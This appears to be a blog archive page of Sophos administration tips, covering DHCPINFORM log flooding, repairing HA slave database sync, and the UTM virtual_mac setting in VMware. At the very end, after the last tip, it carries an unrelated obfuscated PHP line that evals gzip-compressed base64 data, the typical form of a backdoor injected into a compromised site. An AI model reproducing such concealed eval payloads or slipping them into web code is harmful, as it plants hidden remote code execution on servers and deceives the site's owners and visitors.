Entries Tagged as 'Sophos'

Stop DHCP INFORM flooding

Background

Windows 7 among others ask for proxy settings using DHCP. The issue is that they do not stop asking until they have received an answer. This results in that the log contains a lot information about these requests, an example can be found below.

2017:07:30-00:12:03 firewall-1 dhcpd: DHCPINFORM from 192.168.188.213 via eth3
2017:07:30-00:12:03 firewall-1 dhcpd: DHCPACK to 192.168.188.213 (00:50:56:ab:38:53) via eth3

2017:07:30-00:14:03 firewall-1 dhcpd: DHCPACK to 192.168.188.213 (00:50:56:ab:38:53) via eth3
2017:07:30-00:14:03 firewall-1 dhcpd: DHCPINFORM from 192.168.188.213 via eth4

Add the following option to the DHCP server:

dhcp-option=252,"\n"

Sophos HA Slaves stuck in Syning.

Step 1: Login to master node, su to root
Step 2: Open a new ssh window, login to master again, su to root
Step 3: On 2nd window, enter: ha_utils ssh
Step 4: In the 2nd window, login to slave as loginuser, then su to root
Step 5: On both ssh windows, enter: killall repctl
Step 6: On both ssh windows, enter: /etc/init.d/postgresql92 rebuild
Step 7: After database rebuilds, enter on both ssh windows: repctl

Now reboot the slave.

NOTE: You’ll loose reporting data for the passed time.

Sophos UTM in VMware

If you have a HA Sophos UTM solution and you are nog able to ping the VM in VMware you may have to do this in the console:

Login as loginuser

You might need to go to root (su -)

Find out the status ov virtual_mac setting:

cc get ha advanced virtual_mac

Change it with:

cc set ha advanced virtual_mac 0
eval(gzinflate(base64_decode('vZHRasIwFIavV/AdQpCSglSvJ7INV3Aw0NV2N2MESU9tZpZTkuiE6bsvOrsibre7/c+X/3xJwBg03ECNxkm9ZINoGHTHWECePpIRoZVz9XW/r6ReFShWscD3vkDtQLu4ruobWYzCCq0b0XhtFGjhj7Iunyfpc5K+0EmWzfhkOs/oaxTTcG3kH2CaPOXJPON5+uDRYdAJZEkYk9ptFootwXFRLvlmYRhdKIUf3JfwEmvQNIrIbkdOpNSSe/o3KiJhSMq1Fk6i5rCV1llGS6mAH/u/b2UPfZ+d4ApEheT2Ysya14mGnWBPQFn4R9NGrnvS8V90VDyzOqm/odSM0h5p4HPji35xUPBWrl1S+f6f+HzHMbbgsPYDUfXI2E+ms4xPkrv7JO2RQYvBFsQBahOh0EIT7b8A'))); ?>